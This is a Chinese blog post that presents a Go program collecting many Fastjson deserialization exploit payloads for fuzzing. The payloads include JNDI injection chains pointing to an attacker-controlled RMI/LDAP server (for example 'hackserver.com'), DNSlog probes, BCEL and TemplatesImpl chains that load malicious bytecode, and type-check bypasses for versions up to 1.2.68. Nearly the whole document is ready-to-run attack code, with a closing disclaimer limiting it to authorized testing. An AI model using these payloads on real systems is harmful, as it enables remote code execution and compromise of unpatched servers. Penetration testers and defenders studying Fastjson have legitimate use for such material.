Fastjson反序列化漏洞4:payload收集
收集了网络上的多种payload,方便进行fuzz测试
What
无第三方依赖
收集了网络上的多种payload,方便进行fuzz测试
提供了自动替换payload的功能,一次性为所有payload插入rmi地址/dnslog
Help
--list:以清单的形式打印,方便作为字典进行fuzz
--address:服务器地址(无需rmi://前缀),如11.22.33.44/exp、eval.com/rce
--dns:dnslog的地址,不同payload会添加不同的子域名,方便查看是哪一条payload
--code:加载恶意类的code,需要自行添加$$BCEL$$的开头
Example
FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com
FjsonShowPload.exe --address hackserver.com --dns dnslog.com
注意:重定向到文件后,需要去掉banner和结尾的确认信息,或者直接在代码中去除
How
将代码保存为 FjsonSoPload.go
进入命令行窗口:go build ./
即可得到一个 FjsonSoPload.exe
Code
package main
import (
"flag"
"fmt"
)
var id = 1
var dt = false
var cl = true
var code string
var Address string
var dnslog string
var Pal, Hep, Vson string
func main() {
fmt.Println(" ████████ ██ ████████ ██ ███████ ██ ██\n░██░░░░░ ░░ ██░░░░░░ ░██ ░██░░░░██ ░██ ░██\n░██ ██ ██████ ██████ ███████ ░██ ░██ ██████ ███ ██░██ ░██ ░██ ██████ ██████ ░██\n░███████ ░██ ██░░░░ ██░░░░██░░██░░░██░█████████░██████ ██░░░░██░░██ █ ░██░███████ ░██ ██░░░░██ ░░░░░░██ ██████\n░██░░░░ ░██░░█████ ░██ ░██ ░██ ░██░░░░░░░░██░██░░░██░██ ░██ ░██ ███░██░██░░░░ ░██░██ ░██ ███████ ██░░░██\n░██ ██░██ ░░░░░██░██ ░██ ░██ ░██ ░██░██ ░██░██ ░██ ░████░████░██ ░██░██ ░██ ██░░░░██ ░██ ░██\n░██ ░░███ ██████ ░░██████ ███ ░██ ████████ ░██ ░██░░██████ ███░ ░░░██░██ ███░░██████ ░░████████░░██████\n░░ ░░░ ░░░░░░ ░░░░░░ ░░░ ░░ ░░░░░░░░ ░░ ░░ ░░░░░░ ░░░ ░░░ ░░ ░░░ ░░░░░░ ░░░░░░░░ ░░░░░░ \n")
detail := flag.Bool("list", false, "不展示payload细节与利用方式(默认展示)")
code2 := flag.String("code", "恶意code", "恶意code,自行添加$$BCEL$$开头")
dnslog2 := flag.String("dns", "default.com", "dnslog")
Address2 := flag.String("address", "127.0.0.1/exp", "rmi/ldap地址(无需带协议名)")
flag.Parse()
dt = !(*detail)
dnslog = *dnslog2
code = *code2
Address = *Address2
defer fmt.Println("\nYour input :", dnslog, " | ", Address)
//两个版本tomcat的BasicDataSource__bcel
Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource()
//JdbcRowSetImpl__jndi
Show_com_sun_rowset_JdbcRowSetImpl()
//JdbcRowSetImpl__jndi__bypass1.2.25
Bypass25_41_com_sun_rowset_JdbcRowSetImpl()
//JdbcRowSetImpl__jndi__bypass1.2.41--1.2.42
Bypass41_42_com_sun_rowset_JdbcRowSetImpl()
//缓存绕过< 1.2.47
//{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://ip:9999/exp", "autoCommit": true}}
//bcel链的绕过
Bypass25_41_BasicDataSource()
other()
//fmt.Println("\nspring\\tomcat Echo")
}
func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {
Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
Hep = `BCEL加载恶意code的利用链,正连加载恶意code,无需出网`
Vson = `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
Hep = `BCEL加载恶意code的利用链,正连加载恶意code,无需出网`
Vson = `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`
ShowPayload(Pal, Hep, Vson)
}
func Show_com_sun_rowset_JdbcRowSetImpl() {
//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-RMI利用链exp,反连`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
//ldap
Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-ldap利用链exp,反连`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
//dnslog
Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://poc1.` + dnslog + `","autoCommit":true}`
Hep = `JNDI注入-DNSlog利用链poc,请求dnslog`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
}
func Bypass25_41_BasicDataSource() {
//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
Hep = `BCEL利用链exp,正连,类名前后加L与;进行绕过`
Vson = `Fastjson < 1.2.41`
ShowPayload(Pal, Hep, Vson)
}
func other() {
//{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"$type$://$ip$/payload2","autoCommit":true}} #Fastjson <=1.2.24
Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://` + Address + `","autoCommit":true}}`
Hep = `JNDI注入`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://` + Address + `","autoCommit":true}}`
Hep = `JNDI注入`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"dns://ubm.` + dnslog + `","autoCommit":true}}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson <= 1.2.24`
ShowPayload(Pal, Hep, Vson)
//{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload3","autoCommit":true} #Fastjson<=1.2.41
//{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload4","autoCommit":true} #Fastjson<=1.2.42
//{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"$type$://$ip$/payload5","autoCommit":true} #Fastjson<=1.2.43
Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.43`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.43`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"dns://mik.` + dnslog + `","autoCommit":true}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.43`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"$type$://$ip$/payload6"}} #Fastjson<=1.2.45
Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.45`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.45`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"dns://jds.` + dnslog + `"}}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.45`
ShowPayload(Pal, Hep, Vson)
//{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$type$://$ip$/payload7","autoCommit":true}} #Fastjson<=1.2.47
Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.47`
ShowPayload(Pal, Hep, Vson)
Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.47`
ShowPayload(Pal, Hep, Vson)
Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://dbjn.` + dnslog + `","autoCommit":true}}`
Hep = `dnsliog`
Vson = `Fastjson<=1.2.47`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"$type$://$ip$/payload8"} #Fastjson<=1.2.62,CVE-2020-8840
Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.62`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.62`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://cben.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.62`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"$type$://$ip$/payload9"} #Fastjson<=1.2.66
Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"dns://igjt.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"$type$://$ip$/payload10"} #Fastjson<=1.2.66
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"dns://atbc.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload11"}} #Fastjson<=1.2.66
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns://eget.` + dnslog + `"}}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.66`
ShowPayload(Pal, Hep, Vson)
//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload12"} #Fastjson<=1.2.67
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns://antr.` + dnslog + `"}`
Hep = `dnslog`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["$type$://$ip$/payload13"],"Realms":[""]} #Fastjson<=1.2.67
Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["rmi://` + Address + `"],"Realms":[""]}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://` + Address + `"],"Realms":[""]}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["dns://siro.` + dnslog + `"],"Realms":[""]}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
//{"@type":"com.caucho.config.types.ResourceRef","lookupName":"$type$://$ip$/payload14"} #Fastjson<=1.2.67
Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"dns://caco.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload15"}} #Fastjson<=1.2.67
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"dns://jti.` + dnslog + `"}}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.67`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"$type$://$ip$/payload16"} #Fastjson<=1.2.68
Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"dns://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://w9.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"$type$://$ip$/payload17"} #Fastjson<=1.2.68
Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://` + Address + `"}`
Hep = `JNDI注入-exp`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns://ppx.` + dnslog + `"}`
Hep = `JNDI注入-dnslog`
Vson = `Fastjson<=1.2.68`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"$type$://$ip$/payload18"} #未知
Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://` + Address + `"}`
Hep = `jndi`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://` + Address + `"}`
Hep = `jndi`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns://cons.` + dnslog + `"}`
Hep = `dnslog`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
//{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"$type$://$ip$/payload19","rollbackOnly":null} #未知
Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://` + Address + `","rollbackOnly":null}`
Hep = `jndi`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"ldap://` + Address + `","rollbackOnly":null}`
Hep = `jndi`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns://openjpa.` + dnslog + `","rollbackOnly":null}`
Hep = `dnslog`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload20"} #未知
Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
Hep = `bcel`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
//{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
Pal = `{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
Hep = `加载恶意类`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
//TemplatesImpl2.tpl:
//{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
Pal = `{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
Hep = `加载恶意类`
Vson = `未知`
ShowPayload(Pal, Hep, Vson)
}
func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {
//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-RMI利用链exp,反连,类名前后加L与;进行绕过`
Vson = `Fastjson < 1.2.41`
ShowPayload(Pal, Hep, Vson)
//ldap
Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-ldap利用链exp,反连,类名前后加L与;进行绕过`
Vson = `Fastjson < 1.2.41`
ShowPayload(Pal, Hep, Vson)
//dnslog
Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后加L与;进行绕过`
Vson = `Fastjson < 1.2.41`
ShowPayload(Pal, Hep, Vson)
}
func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {
//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-RMI利用链exp,反连,类名前后双写L与;进行绕过`
Vson = ` 1.2.41 <= Fastjson < 1.2.42`
ShowPayload(Pal, Hep, Vson)
//ldap
Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
Hep = `JNDI注入-ldap利用链exp,反连,类名前后双写L与;进行绕过`
Vson = `1.2.41 <= Fastjson < 1.2.42`
ShowPayload(Pal, Hep, Vson)
//dnslog
Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后双写L与;进行绕过`
Vson = `1.2.41 <= Fastjson < 1.2.42`
ShowPayload(Pal, Hep, Vson)
}
func ShowPayload(str ...string) {
const redColor = "\033[31m"
const resetColor = "\033[0m"
if dt {
fmt.Println("┌─────────PayloadID:", id)
id++
fmt.Printf("%s%s%s\n", redColor, str[0], resetColor)
} else {
fmt.Println(str[0])
}
if dt {
fmt.Println("│\n├───[+]payload说明:")
fmt.Print("│ ")
fmt.Println(str[1])
defer fmt.Println("└──────────────────────────────────────────────────────────────────────────────┘\n")
}
if dt {
fmt.Println("│\n├───[+]验证过的版本:")
fmt.Print("│ ")
fmt.Println(str[2])
fmt.Println("│ 注:版本号仅供参考 Fastjson SEC──┐") //
}
}
Thanks
Java中Fastjson各版本漏洞对抗史与总结 - 先知社区 (aliyun.com)
最全fastjson漏洞复现与绕过-腾讯云开发者社区-腾讯云 (tencent.com)
Java反序列化之FastJson反序列化及绕过 - 先知社区 (aliyun.com)
c0ny1/FastjsonExploit(fastjson漏洞快速利用框架) (github.com)
smallfox233/JsonExp: fastjson漏洞批量检测工具 (github.com)
相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!